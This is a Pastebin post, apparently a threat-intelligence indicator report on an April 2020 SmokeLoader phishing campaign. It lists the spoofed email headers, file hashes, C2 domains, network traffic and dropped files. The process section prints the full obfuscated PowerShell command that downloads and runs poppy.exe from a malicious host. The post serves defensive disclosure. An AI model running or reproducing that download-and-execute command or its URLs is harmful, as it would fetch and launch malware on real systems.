SHARE
TWEET

#smokeloader_070420

VRad Apr 9th, 2020 (edited) 5,092 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #IOC #OptiData #VR #smokeloader #LZH #WSH #vmdetect
  2.  
  3. https://pastebin.com/EagNZxKf
  4.  
  5. previous_contact:
  6. https://pastebin.com/QpG70u8T
  7. https://pastebin.com/BJzcXqkK
  8. https://pastebin.com/kBW7nkZ5
  9. https://pastebin.com/Z7zq0YkW
  10. https://pastebin.com/b8PkhMyN
  11. https://pastebin.com/hkskwKvc
  12. https://pastebin.com/JmthzrL4
  13. https://pastebin.com/1scwT0f8
  14. https://pastebin.com/MP3kCSSh
  15.  
  16. FAQ:
  17. https://radetskiy.wordpress.com/2018/10/19/ioc_smokeloader_111018/
  18. https://research.checkpoint.com/2019-resurgence-of-smokeloader/
  19.  
  20. attack_vector
  21. --------------
  22. email attach .RAR (LHa/LZH) > JS > WSH > PowerShell > GET 1URL > exe
  23.  
  24. email_headers
  25. --------------
  26. Received: from hosting.wildpark.net (hosting.wildpark.net [217.77.208.228])
  27. Received: from [127.0.0.1] (unknown [148.251.234.93])
  28.     by hosting.wildpark.net (Postfix) with ESMTPA id 7C920200037A
  29. Reply-To: gpnotorg@protonmail.com
  30. From: dpssmykolayiv@dpssmk.gov.ua
  31. Subject: Re: Задержка по оплате
  32. Message-Id: <1BA02550-FD75-EE8F-008E-A3B99C8754AE@dpssmk.gov.ua>
  33. Date: Tue, 7 Apr 2020 05:10:22 +0300
  34. X-Mailer: iPhone Mail (13E238)
  35. X-FEAS-CLIENT-IP: 217.77.208.228
  36. Return-Path: dpssmykolayiv@dpssmk.gov.ua
  37.  
  38. files
  39. --------------
  40. SHA-256     9ace214924c5edd5a0f2b81a6798a264d92f79f0b30479b821ba3af9a24a422e
  41. File name   План від 05.04.2020р.rar    [ LHa (2.x)/LHark archive data [lh7] - header level 0 ]
  42. File size   6.69 KB (6852 bytes)
  43.  
  44. SHA-256     cf99abc48e39374b48d9729f7efdf4d3aeaf93ce9011708c8cf6a2f939b99854
  45. File name   pax_05.04.2020à..js        [ JavaScript ]
  46. File size   19.80 KB (20278 bytes)
  47.  
  48. SHA-256     4a77f5a9c0c331f53178518cab3e24b4bdb2c230c50ac16d5d917f73ebe8e51b
  49. File name   poppy.exe           [PE32 executable for MS Windows (GUI) Intel 80386 32-bit]
  50. File size   147.00 KB (150528 bytes)
  51.  
  52. SHA-256     8d16d5caad71aaaaa1479f8477d2928b66581c79932a49a21edf93db2803ab9c
  53. File name   9419.tmp (ntdll.dll)        [clean, droped to %temp%,  Microsoft Visual C++ vx.x DLL ]
  54. File size   1.23 MB (1292192 bytes)
  55.  
  56. activity
  57. **************
  58. PL_SCR      http://scproducts7.ru/availableupdatemanager/poppy.exe             
  59.  
  60. C2      amfibiyapolyakova{.} com - thnx for @JAMESWT_MHT
  61.         amfibiyapolyakova{.} com - sinkholed (CyS Centrum)
  62.         siciliyaopartion{.} ru   - sinkholed (CyS Centrum)
  63.         opetileon{.} ru      - sinkholed (CyS Centrum)
  64.         crocopexpire{.} ug   - sinkholed (CyS Centrum)
  65.         yamaha{.} ug         - sinkholed (CyS Centrum)
  66.         informatioshopname{.} ru - thnx for CyS Centrum
  67.  
  68. netwrk
  69. --------------
  70. [http]
  71. 8.208.91.58 scproducts7.ru      GET /availableupdatemanager/poppy.exe HTTP/1.1  Google Chrome  
  72. (!)     !This program cannot be run in DOS mode.
  73. 185.14.31.88    amfibiyapolyakova.com   POST / HTTP/1.1  (application/x-www-form-urlencoded)    Mozilla/5.0
  74.  
  75. [ssl]
  76. 204.79.197.200      www.bing.com    Client Hello
  77.  
  78. comp
  79. --------------
  80. powershell.exe  8.208.91.58 scproducts7.ru 
  81. explorer.exe    185.14.31.88    amfibiyapolyakova.com
  82.  
  83. proc
  84. --------------
  85. C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\pax_05.04.2020à..js
  86.  
  87. C:\Windows\System32\cmd.exe" /c iwbDyExnfhFHuWV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://scproducts7.ru/availableupdatemanager/poppy.exe','%temp%WHk58.exe'); & %temp%WHk58.exe & CXorbhFlHAGsKcP
  88.  
  89. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowErshelL.eXe  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://scproducts7.ru/availableupdatemanager/poppy.exe','C:\tmpWHk58.exe');
  90.  
  91. C:\tmpWHk58.exe
  92.  
  93. persist
  94. --------------
  95. n/a
  96.  
  97. drop
  98. --------------
  99. C:\tmpWHk58.exe
  100. %temp%\9419.tmp
  101. %temp%\se3mut05.g01.ps1
  102. %temp%\nsfka0oj.3qd.psm1
  103. C:\Users\operator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  104.  
  105. # # #
  106. https://www.virustotal.com/gui/file/9ace214924c5edd5a0f2b81a6798a264d92f79f0b30479b821ba3af9a24a422e/details
  107. https://www.virustotal.com/gui/file/cf99abc48e39374b48d9729f7efdf4d3aeaf93ce9011708c8cf6a2f939b99854/details
  108. https://www.virustotal.com/gui/file/4a77f5a9c0c331f53178518cab3e24b4bdb2c230c50ac16d5d917f73ebe8e51b/details
  109. https://analyze.intezer.com/#/analyses/2ad8aa89-9449-4ea1-80d3-e2513c1ff7f6
  110.  
  111. VR
  112.  
  113. @
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top